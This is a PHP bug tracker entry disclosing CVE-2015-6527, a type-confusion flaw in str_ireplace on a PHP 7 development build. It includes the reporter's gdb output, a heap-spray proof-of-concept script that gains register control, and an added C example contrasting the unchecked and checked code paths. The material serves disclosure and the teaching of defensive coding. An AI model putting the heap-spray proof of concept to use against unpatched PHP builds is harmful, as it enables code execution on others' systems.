CVE-2015-6527: PHP :: Bug #70140 :: str_ireplace/php_string_tolower
The php_str_replace_in_subject function in ext/standard/string.c in PHP 7.x before 7.0.0 allows remote attackers to execute arbitrary code via a crafted value in the third argument to the str_ireplace function.
Bug #70140
str_ireplace/php_string_tolower - Arbitrary Code Execution
Submitted:
2015-07-26 14:15 UTC
Modified:
2015-08-23 12:27 UTC
From:
fourny dot d at gmail dot com
Assigned:
laruence (profile)
Status:
Closed
Package:
Strings related
PHP Version:
7.0Git-2015-07-26 (Git)
OS:
x86_64 GNU/Linux
Private report:
No
CVE-ID:
2015-6527
[2015-07-26 14:15 UTC] fourny dot d at gmail dot com
Description:
Hello,
I discovered a vulnerability issue in this PHP version:
$ php --version
PHP 7.0.0-dev (cli) (built: Jul 25 2015 11:31:46) (DEBUG)
Copyright © 1997-2015 The PHP Group
Zend Engine v3.0.0-dev, Copyright © 1998-2015 Zend Technologies
In this new version of PHP, it is possible to control some registers, and this could lead to arbitrary code execution. The problem is in the function "str_ireplace": the type of the third argument, "$subject", is not checked. Because of that, we can control the assembly registers.
We can check that in gdb:
Breakpoint 1, 0x00000000008139ff in php_string_tolower (s=0x7fff55e00020) at /home/df0/php-src/ext/standard/string.c:1503
1503            e = c + ZSTR_LEN(s);
(gdb) x/10i $rip
=> 0x8139ff <php_string_tolower+29>:    mov    rdx,QWORD PTR [rax+0x10]
   0x813a03 <php_string_tolower+33>:    mov    rax,QWORD PTR [rbp-0x18]
   0x813a07 <php_string_tolower+37>:    add    rax,rdx
   0x813a0a <php_string_tolower+40>:    mov    QWORD PTR [rbp-0x20],rax
   0x813a0e <php_string_tolower+44>:    jmp    0x813af2 <php_string_tolower+272>
   0x813a13 <php_string_tolower+49>:    call   0x42b2c0 <__ctype_b_loc@plt>
   0x813a18 <php_string_tolower+54>:    mov    rdx,QWORD PTR [rax]
   0x813a1b <php_string_tolower+57>:    mov    rax,QWORD PTR [rbp-0x18]
   0x813a1f <php_string_tolower+61>:    movzx  eax,BYTE PTR [rax]
   0x813a22 <php_string_tolower+64>:    movzx  eax,al
(gdb) x/10x $rax
0x7fff55e00020: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fff55e00030: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fff55e00040: 0x41414141 0x41414141
(gdb) ni
0x0000000000813a03      1503            e = c + ZSTR_LEN(s);
(gdb) x/x $rdx
0x4141414141414141:     Cannot access memory at address 0x4141414141414141
If you have a question, do not hesitate.
Regards, Dimitri Fourny.
Test script:
<?php
// heap spray
ini_set("memory_limit", -1);
$part = str_repeat("\x41", 4096);
$str = str_repeat($part, 10*1024*1024*256/4096);

// the core
$a = "string";
str_ireplace($a, $a, 0x7fff55e00020);
?>
Actual result:
Program received signal SIGSEGV, Segmentation fault.
0x00000000008139ff in php_string_tolower (s=0x7fff55e00020) at php-src/ext/standard/string.c:1503
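The report above comes down to a missing type check: the third argument of str_ireplace reached php_string_tolower without being verified as a string, so the integer 0x7fff55e00020 was used directly as a zend_string pointer (the s=0x7fff55e00020 in the gdb session). The C program below is an added, self-contained illustration of that bug class next to its defensive fix; it is not PHP's code and does not reproduce the engine's real zval or zend_string layout. The tagged_value and vstring types, the VT_* tags and all function names are constructed stand-ins, and 0x7fff55e00020 is just the value from the report reused as sample input.

```c
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of a tagged value: a type tag plus a union whose
 * payload means different things depending on the tag. Illustrative
 * only; the real zval/zend_string layout differs. */
typedef enum { VT_LONG = 4, VT_STRING = 6 } vtype;

typedef struct {
    size_t len;
    char   val[64];
} vstring;                    /* stand-in for a length-prefixed string */

typedef struct {
    vtype type;
    union {
        int64_t  lval;        /* payload when type == VT_LONG */
        vstring *str;         /* payload when type == VT_STRING */
    } u;
} tagged_value;

/* Buggy pattern: trust that the payload is a string pointer without
 * consulting the tag. For a VT_LONG value the integer bits are simply
 * reinterpreted as a pointer. Returned as an integer so the caller can
 * inspect it without dereferencing it. */
static uintptr_t subject_pointer_unchecked(const tagged_value *z) {
    return (uintptr_t)z->u.str;
}

/* Hardened pattern: validate the tag first; only a genuine string is
 * lower-cased into out. Returns 0 on success, -1 on a type mismatch or
 * an undersized output buffer. */
static int tolower_subject_checked(const tagged_value *z, char *out, size_t outsz) {
    if (z->type != VT_STRING || z->u.str == NULL) return -1;
    const vstring *s = z->u.str;
    if (s->len + 1 > outsz) return -1;
    for (size_t i = 0; i < s->len; i++)
        out[i] = (char)tolower((unsigned char)s->val[i]);
    out[s->len] = '\0';
    return 0;
}

/* Constructors that build values the way a caller would. */
static tagged_value make_long(int64_t v) {
    tagged_value z; z.type = VT_LONG; z.u.lval = v; return z;
}
static tagged_value make_string(vstring *s, const char *text) {
    size_t n = strlen(text);
    if (n >= sizeof s->val) n = sizeof s->val - 1;   /* truncate, never overflow */
    memcpy(s->val, text, n); s->val[n] = '\0'; s->len = n;
    tagged_value z; z.type = VT_STRING; z.u.str = s; return z;
}

/* Scenario 1: an integer pushed through the unchecked path becomes a pointer. */
uintptr_t unchecked_pointer_from_long(int64_t v) {
    tagged_value z = make_long(v);
    return subject_pointer_unchecked(&z);
}

/* Scenario 2: the same integer through the checked path is refused (-1). */
int checked_rejects_long(int64_t v) {
    char buf[64];
    tagged_value z = make_long(v);
    return tolower_subject_checked(&z, buf, sizeof buf);
}

/* Scenario 3: a real string still works; returns 1 if the result equals expected. */
int lowercases_to(const char *text, const char *expected) {
    vstring s; char out[64];
    tagged_value z = make_string(&s, text);
    if (tolower_subject_checked(&z, out, sizeof out) != 0) return 0;
    return strcmp(out, expected) == 0;
}

int main(void) {
    int64_t v = 0x7fff55e00020LL;                 /* value from the report, as sample input */
    printf("unchecked: long %#llx reused as pointer %#llx\n",
           (unsigned long long)v, (unsigned long long)unchecked_pointer_from_long(v));
    printf("checked:   long rejected, rc=%d\n", checked_rejects_long(v));
    printf("checked:   \"STRING\" lower-cases correctly: %d\n", lowercases_to("STRING", "string"));
    return 0;
}
```

The point to take from the two paths is that the checked variant fails closed on the tag rather than on the memory access: a non-string subject is reported as a type error before any pointer derived from its payload is touched, which is the behaviour a caller of a string-only helper has to guarantee itself.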
History
[2015-07-27 13:44 UTC] laruence@php.net
-Status: Open
+Status: Closed
-Assigned To:
+Assigned To: laruence
[2015-07-29 10:37 UTC] fourny dot d at gmail dot com
Thank you. Can you make this bug public please?
Regards, Dimitri Fourny.
[2015-07-29 18:18 UTC] stas@php.net
-Type: Security
+Type: Bug